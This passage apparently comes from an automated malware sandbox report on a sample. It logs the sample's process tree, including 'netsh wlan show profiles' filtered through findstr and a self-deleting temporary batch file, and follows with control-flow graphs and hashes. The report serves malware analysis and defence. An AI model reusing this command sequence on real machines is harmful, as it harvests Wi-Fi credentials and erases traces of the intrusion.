                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\chcp.com
                                    Wow64 process (32bit):true
                                    Commandline:chcp 65001
                                    Imagebase:0xa40000
                                    File size:12'800 bytes
                                    MD5 hash:41146159AA3D41A92B53ED311EE15693
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:9
                                    Start time:09:07:29
                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\netsh.exe
                                    Wow64 process (32bit):true
                                    Commandline:netsh wlan show profiles
                                    Imagebase:0xc90000
                                    File size:82'432 bytes
                                    MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:09:07:29
                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr All
                                    Imagebase:0xe60000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:09:07:43
                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpBA88.tmp.bat
                                    Imagebase:0xaa0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:09:07:43
                                    Start date:04/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff614b20000
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:14
                                    Start time:09:07:43
                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\chcp.com
                                    Wow64 process (32bit):true
                                    Commandline:chcp 65001
                                    Imagebase:0xa40000
                                    File size:12'800 bytes
                                    MD5 hash:41146159AA3D41A92B53ED311EE15693
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:09:07:43
                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                    Wow64 process (32bit):true
                                    Commandline:TaskKill /F /IM 2956
                                    Imagebase:0xed0000
                                    File size:74'240 bytes
                                    MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:09:07:44
                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:Timeout /T 2 /Nobreak
                                    Imagebase:0xf60000
                                    File size:25'088 bytes
                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:09:07:44
                                    Start date:04/12/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 2948
                                    Imagebase:0xfc0000
                                    File size:482'640 bytes
                                    MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:32.1%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:100%
                                      Total number of Nodes:24
                                      Total number of Limit Nodes:0
                                      execution_graph 39029 2eb4b78 39030 2eb4bc6 NtCreateSection 39029->39030 39032 2eb4c13 39030->39032 39033 2eb41c8 39034 2eb4208 NtClose 39033->39034 39036 2eb4239 39034->39036 39037 2eb4ed8 39038 2eb4f20 NtDeviceIoControlFile 39037->39038 39040 2eb4f6d 39038->39040 39041 2eb4758 39042 2eb47a3 NtAllocateVirtualMemory 39041->39042 39044 2eb47ea 39042->39044 39045 2eb4aa0 39046 2eb4aee NtOpenFile 39045->39046 39048 2eb4b38 39046->39048 39049 2eb4d20 39050 2eb4d6b NtMapViewOfSection 39049->39050 39052 2eb4dcd 39050->39052 39053 2eb4680 39054 2eb46ce NtProtectVirtualMemory 39053->39054 39056 2eb4718 39054->39056 39057 2eb4e10 39058 2eb4e58 NtQueryVolumeInformationFile 39057->39058 39060 2eb4e96 39058->39060
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: &8+%$3>;Y$5[.)$#%r^$#%r^$+%r^$+%r^$+%r^$3%r^$3%r^$;%r^$;%r^$;%r^$C%r^$K%r^$[%r^$[%r^$c%r^$k%r^$s%r^$s%r^${%r^$%r^$%r^
                                      • API String ID: 0-850999894
                                      • Opcode ID: ddeeceea043254a488ddc1e7ba1fe4a541c4ef4560eada31a97fafc495e094c5
                                      • Instruction ID: d8ec184e2f7ec886ef39a850a60dca7188ec0958787b519c5161844009201119
                                      • Opcode Fuzzy Hash: ddeeceea043254a488ddc1e7ba1fe4a541c4ef4560eada31a97fafc495e094c5
                                      • Instruction Fuzzy Hash: 08E32875F012289FCB55DF28C950A9DBBF6FB89210F5581EAE409EB350DB30AE818F54
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: &8+%$3>;Y$5[.)$#%r^$#%r^$+%r^$+%r^$+%r^$3%r^$3%r^$;%r^$;%r^$;%r^$C%r^$K%r^$[%r^$[%r^$c%r^$k%r^$s%r^$s%r^${%r^$%r^$%r^
                                      • API String ID: 0-850999894
                                      • Opcode ID: b0963598328009753a809eb0b3c2774c116a9dbc8ed3810d1543eb229ccba2f7
                                      • Instruction ID: ee6d292371e2622baecc59cbfba88d764ab1c682d69377ad75409b153cfa2ff3
                                      • Opcode Fuzzy Hash: b0963598328009753a809eb0b3c2774c116a9dbc8ed3810d1543eb229ccba2f7
                                      • Instruction Fuzzy Hash: ACE31875F012289FCB55DF28C950A9DBBF6FB89210F5581EAE409EB350DB30AE818F54
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (o7r$(o7r$.%$$1M6$=4W$H;r$H;r$\s7r$p;r$p;r$;7r
                                      • API String ID: 0-1422656119
                                      • Opcode ID: 674f6c0ea853eb53b596eb09bfaba49ce54c93962c41fd66e8709a9ba7cec735
                                      • Instruction ID: 7d73e108bcb8a0b2e1a151161babd57a3de619c7f83bb6f930a9b53d21d17f62
                                      • Opcode Fuzzy Hash: 674f6c0ea853eb53b596eb09bfaba49ce54c93962c41fd66e8709a9ba7cec735
                                      • Instruction Fuzzy Hash: BE039E76B403258FDB64DF68D8C4A9DBBB2BF89300F1481A9E509AB361DB759D81CF40

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2798 2ebdf00-2ebdf12 2800 2ebdf35-2ebdf40 2798->2800 2801 2ebdf14-2ebdf1a 2798->2801 2802 2ebdf1c-2ebdf32 2801->2802 2803 2ebdf43-2ebdf71 2801->2803 2805 2ebdf77-2ebdf9a 2803->2805 2806 2ebdff4-2ebdffd 2803->2806 2808 2ebdffe-2ebe026 2805->2808 2809 2ebdf9c-2ebdfa2 2805->2809 2814 2ebe028-2ebe036 2808->2814 2815 2ebe037-2ebe05e 2808->2815 2809->2806 2810 2ebdfa4 2809->2810 2811 2ebdfa7-2ebdfaa 2810->2811 2811->2808 2813 2ebdfac-2ebdfba 2811->2813 2816 2ebdfde-2ebdfe4 2813->2816 2817 2ebdfbc-2ebdfd3 2813->2817 2822 2ebe06f-2ebe096 2815->2822 2823 2ebe060-2ebe06e 2815->2823 2816->2808 2818 2ebdfe6-2ebdff2 2816->2818 2817->2816 2824 2ebdfd5-2ebdfdd 2817->2824 2818->2806 2818->2811 2827 2ebe098-2ebe0a6 2822->2827 2828 2ebe0a7-2ebe0ce 2822->2828 2831 2ebe0df-2ebe10d 2828->2831 2832 2ebe0d0-2ebe0de 2828->2832 2835 2ebe10f-2ebe11b 2831->2835 2836 2ebe11c-2ebe146 2831->2836 2839 2ebe14b-2ebe17b 2836->2839 2840 2ebe199-2ebe1be 2839->2840 2841 2ebe17d-2ebe191 2839->2841 2845 2ebe1cf-2ebe1fd 2840->2845 2846 2ebe1c0-2ebe1ce 2840->2846 2841->2839 2844 2ebe193-2ebe198 2841->2844 2849 2ebe1ff-2ebe20b 2845->2849 2850 2ebe20c-2ebe236 2845->2850 2853 2ebe238-2ebe246 2850->2853 2854 2ebe247-2ebe26c 2850->2854 2857 2ebe271-2ebe280 2854->2857 2858 2ebe2c9-2ebe2ee 2857->2858 2859 2ebe282-2ebe2a4 2857->2859 2863 2ebe2ff-2ebe326 2858->2863 2864 2ebe2f0-2ebe2fe 2858->2864 2859->2857 2862 2ebe2a6-2ebe2c8 2859->2862 2868 2ebe328-2ebe336 2863->2868 2869 2ebe337-2ebe35e 2863->2869 2873 2ebe36f-2ebe396 2869->2873 2874 2ebe360-2ebe36e 2869->2874 2878 2ebe398-2ebe3a6 2873->2878 2879 2ebe3a7-2ebe3ce 2873->2879 2882 2ebe3df-2ebe3f0 2879->2882 2883 2ebe3d0-2ebe3de 2879->2883 2886 2ebe40e-2ebe416 2882->2886 2887 2ebe3f2-2ebe406 2882->2887 2888 2ebe408 2887->2888 2889 2ebe417-2ebe453 2887->2889 2888->2886 2892 2ebe465-2ebe48e 2889->2892 2893 2ebe455-2ebe464 2889->2893 2896 2ebe493-2ebe4bc 2892->2896 2897 2ebe4da-2ebe59d call 2ebde80 * 6 2896->2897 2898 2ebe4be-2ebe4d2 2896->2898 2921 2ebe5a3-2ebe5c2 call 2ebde80 2897->2921 2922 2ebe624-2ebe64f 2897->2922 2898->2896 2901 2ebe4d4-2ebe4d9 2898->2901 2921->2922 2926 2ebe5c4-2ebe5cd 2921->2926 2927 2ebe654-2ebf597 call 2ebde80 * 67 2922->2927 2928 2ebe5d2-2ebe60c call 2ebde80 2926->2928 3139 2ebf599-2ebf5b8 2927->3139 3140 2ebf5c6-2ebf7a8 call 2ebde80 * 18 2927->3140 2928->2922 2941 2ebe60e-2ebe623 2928->2941 3139->2927 3143 2ebf5be-2ebf5c5 3139->3143 3200 2ebf7aa-2ebf7bb 3140->3200 3201 2ebf7bc-2ebf808 3140->3201 3204 2ebf80d-2ebf81c 3201->3204 3205 2ebfd18-2ebfd2e 3204->3205 3206 2ebf822-2ebf82e 3204->3206 3208 2ebfba9-2ebfbc9 call 2ebde80 3205->3208 3209 2ebfd34-2ebfd9a 3205->3209 3206->3204 3207 2ebf830-2ebf850 3206->3207 3217 2ebf852-2ebf860 call 2ebfeaf 3207->3217 3289 2ebfbcf call 818c568 3208->3289 3290 2ebfbcf call 818c559 3208->3290 3213 2ebfda0-2ebfdce 3209->3213 3219 2ebfcac-2ebfcdd 3213->3219 3220 2ebfdd4-2ebfde8 3213->3220 3217->3204 3225 2ebf862-2ebf881 3217->3225 3219->3208 3230 2ebfce3-2ebfcfe 3219->3230 3223 2ebfdea-2ebfe0f 3220->3223 3224 2ebfe1d-2ebfe3c 3220->3224 3221 2ebfbd5-2ebfc04 3221->3224 3236 2ebfc0a-2ebfc24 3221->3236 3223->3208 3233 2ebfe15 3223->3233 3234 2ebfe3e-2ebfe65 3224->3234 3235 2ebfe67 3224->3235 3225->3224 3228 2ebf887-2ebf88b 3225->3228 3291 2ebf891 call 2d402b4 3228->3291 3292 2ebf891 call 2d4023c 3228->3292 3293 2ebfd01 call 818ce10 3230->3293 3294 2ebfd01 call 818cea0 3230->3294 3295 2ebfe15 call 6cd3828 3233->3295 3296 2ebfe15 call 818dcdf 3233->3296 3297 2ebfe15 call 818da65 3233->3297 3242 2ebfea5-2ebfeac 3234->3242 3239 2ebfe6c-2ebfe84 3235->3239 3244 2ebfc29-2ebfc31 3236->3244 3237 2ebf897-2ebf902 call 2ebde80 3237->3204 3253 2ebf908-2ebf983 3237->3253 3238 2ebfd07 3238->3242 3239->3235 3245 2ebfe86-2ebfea0 3239->3245 3241 2ebfe1b 3241->3239 3244->3213 3248 2ebfc37-2ebfca6 3244->3248 3245->3242 3248->3208 3248->3219 3253->3217 3260 2ebf989-2ebf9b4 3253->3260 3263 2ebf9cf-2ebf9d5 3260->3263 3263->3207 3264 2ebf9db-2ebf9f1 3263->3264 3265 2ebf9f3-2ebfa0e 3264->3265 3266 2ebf9b6-2ebf9bd 3264->3266 3265->3204 3267 2ebfa14-2ebfa4a 3265->3267 3268 2ebf9c9-2ebf9ca 3266->3268 3271 2ebfa51-2ebfa7b 3267->3271 3268->3263 3271->3207 3272 2ebfa81-2ebfae3 call 2ebde80 3271->3272 3272->3204 3278 2ebfae9-2ebfb56 3272->3278 3280 2ebfb58-2ebfb61 3278->3280 3281 2ebfb66-2ebfb81 3278->3281 3280->3281 3281->3280 3284 2ebfb83-2ebfb89 3281->3284 3284->3280 3285 2ebfb8b-2ebfba6 3284->3285 3285->3208 3289->3221 3290->3221 3291->3237 3292->3237 3293->3238 3294->3238 3295->3241 3296->3241 3297->3241
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43974196529.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2eb0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: f<r$(&#X$1r 1$7u/U$8P#
                                      • API String ID: 0-3012844866
                                      • Opcode ID: 68c5473071b97e99b33a14bfea85d31b835bc29e18bc318e2dc108dfc4eac0c5
                                      • Instruction ID: 3cb72c6f758a5ba765ffe465db614bff2fbd3066fb8e9348f3f0f10d1895cb46
                                      • Opcode Fuzzy Hash: 68c5473071b97e99b33a14bfea85d31b835bc29e18bc318e2dc108dfc4eac0c5
                                      • Instruction Fuzzy Hash: 5803C475F002258FD759DB68C890B9BB7E7AFC8300F5585B9E80AEB345DA31AD05CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: *9b$.h8U$$7r$$7r
                                      • API String ID: 0-1312752979
                                      • Opcode ID: be8738790efbc05961f428410c7d54642765ba107efdb31df2e54d9cab26975d
                                      • Instruction ID: 80eb8066553db2db1ee898f248260c9f4385b9f01ba2bcdf5972b5d6de5fa911
                                      • Opcode Fuzzy Hash: be8738790efbc05961f428410c7d54642765ba107efdb31df2e54d9cab26975d
                                      • Instruction Fuzzy Hash: 12135075E011298FCB55DF69C894699F7F2AF88300F1585EAD909EB341DB35AE82CF80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987922369.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8190000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (;r$(;r$x;r$x;r
                                      • API String ID: 0-2578400979
                                      • Opcode ID: d9db6b5e5254eb7712011aacf0441cab8ddeec397eeae5fac4a2773f15ba16bf
                                      • Instruction ID: 2f5f9a280b5d908802370299c3c60757ce1eb1a47bb477682ee0c968af2d4a65
                                      • Opcode Fuzzy Hash: d9db6b5e5254eb7712011aacf0441cab8ddeec397eeae5fac4a2773f15ba16bf
                                      • Instruction Fuzzy Hash: 8BF28336F002248FDB55DF68D89099AF7A3BF9431071A8669E849EB355DB71EC06CBC0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 5531 6cd9ac0-6cd9ac7 5532 6cd9ac9-6cd9ad5 5531->5532 5533 6cd9b2e-6cd9b51 5532->5533 5534 6cd9ad7-6cd9b03 5532->5534 5540 6cd9b56-6cd9b6a 5533->5540 5534->5532 5537 6cd9b05-6cd9b19 5534->5537 5537->5533 5539 6cd9b1b-6cd9b2d 5537->5539 5541 6cd9b70-6cd9b9e 5540->5541 5542 6cd9c02-6cd9c25 call 6cd9ac0 5540->5542 5544 6cd9c45-6cd9c77 5541->5544 5545 6cd9ba4-6cd9bbe 5541->5545 5555 6cd9c27-6cd9c44 5542->5555 5551 6cd9c7a-6cd9c85 5544->5551 5545->5542 5550 6cd9bc0-6cd9bc6 5545->5550 5550->5540 5553 6cd9bc8-6cd9bdd 5550->5553 5554 6cd9c88-6cd9c92 5551->5554 5553->5541 5556 6cd9bdf-6cd9bfa 5553->5556 5557 6cd9cdc-6cd9d1f 5554->5557 5558 6cd9c94 5554->5558 5556->5541 5559 6cd9c00 5556->5559 5561 6cd9d25-6cd9d90 5557->5561 5562 6cda377-6cda385 5557->5562 5560 6cd9c9a-6cd9ca7 5558->5560 5559->5555 5564 6cd9cad-6cd9cd5 5560->5564 5565 6cda224-6cda24a 5560->5565 5561->5554 5576 6cd9d96-6cd9d9d 5561->5576 5571 6cda388-6cda391 5562->5571 5564->5564 5566 6cd9cd7 5564->5566 5567 6cda250-6cda261 5565->5567 5566->5571 5567->5564 5572 6cda267-6cda277 5567->5572 5572->5560 5577 6cda27d-6cda2b4 5572->5577 5578 6cd9d9f-6cd9db5 5576->5578 5579 6cd9dc0-6cd9dd5 5576->5579 5582 6cda2ba-6cda2c0 5577->5582 5578->5551 5580 6cd9dbb-6cda351 5578->5580 5579->5562 5581 6cd9ddb-6cd9e12 5579->5581 5580->5571 5581->5551 5594 6cd9e18-6cd9e32 5581->5594 5582->5551 5583 6cda2c6-6cda302 5582->5583 5585 6cda308-6cda30e 5583->5585 5586 6cd9e37-6cd9e3a 5583->5586 5585->5551 5588 6cda314-6cda32b 5585->5588 5586->5562 5589 6cd9e40-6cd9e56 5586->5589 5588->5564 5591 6cda331 5588->5591 5589->5562 5593 6cd9e5c-6cd9e9d 5589->5593 5595 6cda33a-6cda340 5591->5595 5593->5551 5601 6cd9ea3-6cd9ed0 5593->5601 5594->5582 5595->5551 5597 6cda346-6cda36f 5595->5597 5597->5551 5600 6cda375 5597->5600 5600->5571 5602 6cd9edc-6cd9eef call 6cd2818 5601->5602 5603 6cd9ed2-6cd9eda 5601->5603 5604 6cd9ef1-6cd9f06 5602->5604 5603->5604 5607 6cd9f08-6cd9f0e 5604->5607 5608 6cd9f14-6cd9f3c 5604->5608 5609 6cd9f10 5607->5609 5610 6cd9f12 5607->5610 5608->5567 5611 6cd9f42-6cd9f5b 5608->5611 5609->5608 5610->5608 5611->5562 5612 6cd9f61-6cd9f77 5611->5612 5645 6cd9f7d call 2ebd750 5612->5645 5646 6cd9f7d call 2ebde80 5612->5646 5613 6cd9f82-6cd9f9c 5615 6cd9f9e-6cd9fa7 5613->5615 5616 6cd9fb1-6cd9fcf call 6cd2818 5613->5616 5615->5560 5617 6cd9fad-6cd9faf 5615->5617 5621 6cd9fee-6cda011 5616->5621 5622 6cd9fd1-6cd9fde 5616->5622 5619 6cda013-6cda041 5617->5619 5626 6cda139-6cda1d6 5619->5626 5627 6cda047-6cda058 5619->5627 5621->5619 5622->5554 5623 6cd9fe4-6cd9fec 5622->5623 5623->5619 5626->5551 5643 6cda1dc-6cda219 5626->5643 5627->5551 5628 6cda05e-6cda06c 5627->5628 5628->5562 5629 6cda072-6cda09e 5628->5629 5629->5626 5634 6cda0a4-6cda0d9 5629->5634 5634->5562 5636 6cda0df-6cda10a 5634->5636 5636->5562 5637 6cda110-6cda119 5636->5637 5639 6cda11e-6cda133 5637->5639 5639->5626 5643->5560 5644 6cda21f 5643->5644 5644->5571 5645->5613 5646->5613
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: e)"$?2z$$7r
                                      • API String ID: 0-4235450849
                                      • Opcode ID: 22761cbaa8e21d13636f885cd092203e1b6f2e130f26119f80a81b2c61770470
                                      • Instruction ID: 896300225055aa71f9972821c1834f453236495e9a56d9ff8bce6d52c6a78a97
                                      • Opcode Fuzzy Hash: 22761cbaa8e21d13636f885cd092203e1b6f2e130f26119f80a81b2c61770470
                                      • Instruction Fuzzy Hash: 5632C076F002248FC754DF6DC980999B7F3ABC8314B1A856AE909EB355DA35ED42CBC0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 5647 6cdec70-6cdec78 5648 6cdec8a-6cdec9f 5647->5648 5649 6cdec7a-6cdec86 5647->5649 5650 6cdeca4-6cdecd1 5648->5650 5649->5648 5653 6cdecd3-6cdee9a 5650->5653 5827 6cdeea0 call 2ebd750 5653->5827 5828 6cdeea0 call 2ebde80 5653->5828 5669 6cdeea5-6cdf608 5732 6cdf679-6cdf779 5669->5732 5733 6cdf60a-6cdf66e 5669->5733 5831 6cdf77f call 2ebd750 5732->5831 5832 6cdf77f call 2ebde80 5732->5832 5733->5732 5742 6cdf784-6cdf798 5744 6cdf79b-6cdf7b0 5742->5744 5745 6cdfcb5-6cdfcde 5744->5745 5746 6cdf7b6-6cdf7ce 5744->5746 5749 6cdfcef-6cdfd14 5745->5749 5750 6cdfce0-6cdfcee 5745->5750 5746->5745 5747 6cdf7d4-6cdf8a4 5746->5747 5747->5745 5768 6cdf8aa-6cdf8e8 5747->5768 5755 6cdfd17-6cdfd2d 5749->5755 5758 6cdff6e-6cdff79 5755->5758 5759 6cdfd33-6cdfdb4 5755->5759 5758->5755 5763 6cdff7f-6cdff86 5758->5763 5761 6cdfdb6-6cdfdb8 5759->5761 5762 6cdfdc0-6cdfdc3 5759->5762 5764 6cdfdbe 5761->5764 5765 6cdff89 5761->5765 5762->5765 5767 6cdfdc9-6cdfdd8 5762->5767 5764->5767 5769 6cdff8e-6cdff94 5765->5769 5767->5769 5770 6cdfdde-6cdfde5 5767->5770 5768->5745 5774 6cdf8ee-6cdf98a 5768->5774 5820 6cdfde8 call 2ebd750 5770->5820 5821 6cdfde8 call 2ebde80 5770->5821 5772 6cdfded-6cdfe36 5775 6cdfe38-6cdfe3c 5772->5775 5776 6cdfe44-6cdfe48 5772->5776 5774->5745 5787 6cdf990-6cdf9c5 5774->5787 5775->5765 5777 6cdfe42 5775->5777 5776->5765 5778 6cdfe4e-6cdfe54 5776->5778 5777->5778 5778->5769 5780 6cdfe5a-6cdfe6c 5778->5780 5822 6cdfe6e call 2d420a4 5780->5822 5823 6cdfe6e call 2d421d4 5780->5823 5824 6cdfe6e call 2d420fc 5780->5824 5825 6cdfe6e call 2d4043c 5780->5825 5826 6cdfe6e call 2d40388 5780->5826 5784 6cdfe74-6cdfead 5788 6cdfeaf-6cdfeb3 5784->5788 5789 6cdfebb-6cdfebf 5784->5789 5787->5745 5794 6cdf9cb-6cdfa6f 5787->5794 5788->5765 5791 6cdfeb9 5788->5791 5789->5765 5790 6cdfec5-6cdfed8 5789->5790 5790->5769 5792 6cdfede-6cdff23 5790->5792 5791->5790 5792->5769 5796 6cdff25-6cdff2e 5792->5796 5794->5744 5806 6cdfa75-6cdfac8 5794->5806 5829 6cdff34 call 2ebd750 5796->5829 5830 6cdff34 call 2ebde80 5796->5830 5799 6cdff39-6cdff68 5799->5758 5806->5745 5807 6cdface 5806->5807 5833 6cdfad2 call 2d420a4 5807->5833 5834 6cdfad2 call 2d423d0 5807->5834 5835 6cdfad2 call 2d4244c 5807->5835 5836 6cdfad2 call 2d420fc 5807->5836 5808 6cdfad8-6cdfaec 5808->5732 5810 6cdfaf2-6cdfb4d 5808->5810 5810->5653 5812 6cdfb53-6cdfb9a 5810->5812 5812->5745 5813 6cdfba0-6cdfbee 5812->5813 5813->5745 5815 6cdfbf4-6cdfc7b 5813->5815 5815->5745 5817 6cdfc7d-6cdfcb4 5815->5817 5820->5772 5821->5772 5822->5784 5823->5784 5824->5784 5825->5784 5826->5784 5827->5669 5828->5669 5829->5799 5830->5799 5831->5742 5832->5742 5833->5808 5834->5808 5835->5808 5836->5808
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /v<l$W]N1
                                      • API String ID: 0-4166033473
                                      • Opcode ID: 96bded49cbbdb41387225582fa2efc3982a386751f5c7c4084c34bf29cd66f50
                                      • Instruction ID: 7a2be5a137e95c1fb2f65d6b75f068840efee3d21a6a1991ce2e382de4c99651
                                      • Opcode Fuzzy Hash: 96bded49cbbdb41387225582fa2efc3982a386751f5c7c4084c34bf29cd66f50
                                      • Instruction Fuzzy Hash: 1BB27076F002288BD755DF69C8506DEF7E6AF98310F0585AAE94AFB344DA30AD458FC0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 5837 2d40fa4-2d40fc7 5839 2d40fdf-2d40fe3 5837->5839 5840 2d40fc9-2d40fcf 5837->5840 5843 2d40fe9-2d40fea 5839->5843 5841 2d40fd1 5840->5841 5842 2d40fd3-2d40fdd 5840->5842 5841->5839 5842->5839
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Lluq$$7r$$7r
                                      • API String ID: 0-2700789123
                                      • Opcode ID: 6eb55f6baf932e87f3c8096f1f71cdc2497a7b06636323beddb6b4de8e32d71d
                                      • Instruction ID: 3eb9ba1ab2ffa616263044c632edf0dac5a3bec6980e5dffd75adbf3413a5730
                                      • Opcode Fuzzy Hash: 6eb55f6baf932e87f3c8096f1f71cdc2497a7b06636323beddb6b4de8e32d71d
                                      • Instruction Fuzzy Hash: 0D21023170D3C14FC72B466888605617FB3AF8B21532941EBD1C6EB3A3CA25DC49C792
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: u7T
                                      • API String ID: 0-3770851354
                                      • Opcode ID: 91487db7eff3660da0c3f113322874b840f0a7de7b5c0dcbc0e67cd2c5ad9f71
                                      • Instruction ID: db97d07c4ee4b4cf959e73bf40e6c2dc6681056c45fe3da46f68bcdb96cf2645
                                      • Opcode Fuzzy Hash: 91487db7eff3660da0c3f113322874b840f0a7de7b5c0dcbc0e67cd2c5ad9f71
                                      • Instruction Fuzzy Hash: 56032C76E00229CBDB54DF68C985A99F7F2BF88310F1586A9D809EB355D730AD85CF80

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
